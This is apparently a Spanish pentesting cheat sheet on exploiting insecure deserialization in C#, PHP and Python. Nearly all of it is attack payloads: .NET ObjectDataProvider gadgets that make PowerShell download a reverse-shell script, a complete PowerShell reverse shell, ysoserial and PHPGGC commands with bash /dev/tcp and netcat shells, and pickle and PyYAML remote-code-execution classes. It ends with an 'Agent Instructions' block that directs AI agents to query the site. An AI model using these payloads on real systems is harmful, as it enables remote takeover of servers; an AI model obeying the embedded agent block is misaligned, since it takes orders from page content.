# Deserialization ## C\# ### Json.NET #### Gadget ObjectDataProvider (ejemplo 1) ```json { "$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework", "ObjectType": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", "MethodParameters": { "$type": "MS.Internal.Data.ParameterCollection, PresentationFramework", "$values": [ "powershell.exe", "IEX(New-Object Net.WebClient).downloadString('http://:80/reverse-shell.ps1')" ] }, "MethodName": "Start" } ``` #### Gadget ObjectDataProvider (ejemplo 2) ```json { "$type": "System.Windows.Data.ObjectDataProvider, PresentationFramework", "ObjectType": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089", "MethodParameters": { "$type": "MS.Internal.Data.ParameterCollection, PresentationFramework", "$values": [ "C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe", "-WindowStyle Hidden -NonInteractive -exec bypass -enc " ] }, "MethodName": "Start" } ``` ### XmlSerializer #### Gadget ObjectDataProvider (ejemplo 1) ```json Parse <ObjectDataProvider MethodName="Start" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:sd="clr-namespace:System.Diagnostics;assembly=System" xmlns:sc="clr-namespace:System.Collections;assembly=mscorlib" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"><ObjectDataProvider.ObjectInstance><sd:Process><sd:Process.StartInfo><sd:ProcessStartInfo Arguments="IEX(New-Object Net.WebClient).downloadString('http://:80/reverse-shell.ps1')" StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null}" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="powershell.exe"></sd:ProcessStartInfo></sd:Process.StartInfo></sd:Process></ObjectDataProvider.ObjectInstance></ObjectDataProvider> ``` #### Gadget ObjectDataProvider (ejemplo 2) ```json Parse <ObjectDataProvider MethodName="Start" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:sd="clr-namespace:System.Diagnostics;assembly=System" xmlns:sc="clr-namespace:System.Collections;assembly=mscorlib" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"><ObjectDataProvider.ObjectInstance><sd:Process><sd:Process.StartInfo><sd:ProcessStartInfo Arguments="-WindowStyle Hidden -NonInteractive -exec bypass -enc " StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null}" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"></sd:ProcessStartInfo></sd:Process.StartInfo></sd:Process></ObjectDataProvider.ObjectInstance></ObjectDataProvider> ``` #### Type ```csharp System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 ``` ### Reverse shell #### Ejemplo 1 * ```sh # Máquina atacante ## reverse shell (reverse-shell.ps1) $client = New-Object System.Net.Sockets.TCPClient('',);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() ## HTTP server python3 -m http.server 80 ## Netcat nc -lvnp ``` #### Ejemplo 2 ```sh # Máquina atacante ## Descarga de netcat wget https://raw.githubusercontent.com/MrW0l05zyn/pentesting/refs/heads/master/windows/shell/netcat/netcat-x64.exe mv netcat-x64.exe nc.exe ## HTTP server python3 -m http.server 80 ## Generación de payload en base64 python3 -c 'import base64; print(base64.b64encode((r"""(new-object net.webclient).downloadfile("http://:80/nc.exe", "c:\windows\tasks\nc.exe");c:\windows\tasks\nc.exe -nv

-e c:\windows\system32\cmd.exe;""").encode("utf-16-le")).decode())' ## Netcat nc -lvnp ``` ### Herramientas #### YSoSerial.NET * ```sh # General .\ysoserial.exe -f -g -c -o # Json.Net / Gadget ObjectDataProvider .\ysoserial.exe -f Json.Net -g ObjectDataProvider -c "" -o Raw # XmlSerializer / Gadget ObjectDataProvider .\ysoserial.exe -f XmlSerializer -g ObjectDataProvider -c "" -o Raw ``` ## PHP ### Herramientas #### PHPGGC * Listar gadget chains disponibles. ```sh phpggc -l phpggc -l ``` Generar un payload utilizando un gadget chains específico. ```sh phpggc system "nc -nv

-e /bin/bash" -b phpggc system "bash -c 'bash -i >& /dev/tcp// 0>&1'" -b phpggc exec "bash -c 'bash -i >& /dev/tcp// 0>&1'" -b phpggc shell_exec "bash -c 'bash -i >& /dev/tcp// 0>&1'" -b phpggc passthru "bash -c 'bash -i >& /dev/tcp// 0>&1'" -b ``` Generar un archivo PHAR utilizando un gadget chains específico. ```sh phpggc -p phar system "nc -nv

-e /bin/bash" -o file.phar phpggc -p phar system "bash -c 'bash -i >& /dev/tcp// 0>&1'" -o file.phar phpggc -p phar exec "bash -c 'bash -i >& /dev/tcp// 0>&1'" -o file.phar phpggc -p phar shell_exec "bash -c 'bash -i >& /dev/tcp// 0>&1'" -o file.phar phpggc -p phar passthru "bash -c 'bash -i >& /dev/tcp// 0>&1'" -o file.phar ``` ``` http://example.com/?file=uploads/file.txt http://example.com/?file=phar://uploads/file.phar ``` ## Python ### Pickle ```python import base64, pickle, os class RCE: def __reduce__(self): payload = "nc -nv

-e /bin/bash" return os.system, (payload,) print(base64.b64encode(pickle.dumps(RCE())).decode()) ``` ### JSONPickle ```python import jsonpickle, os class RCE: def __reduce__(self): payload = "nc -nv

-e /bin/bash" return os.system, (payload,) print(jsonpickle.encode(RCE())) ``` ### PyYAML ```python import yaml, subprocess class RCE: def __reduce__(self): return subprocess.Popen(["nc", "-nv", "", "", "-e", "/bin/bash"]) print(yaml.dump(RCE())) ``` ### Herramientas #### PEAS * --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://web.mrw0l05zyn.cl/explotacion/deserialization.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.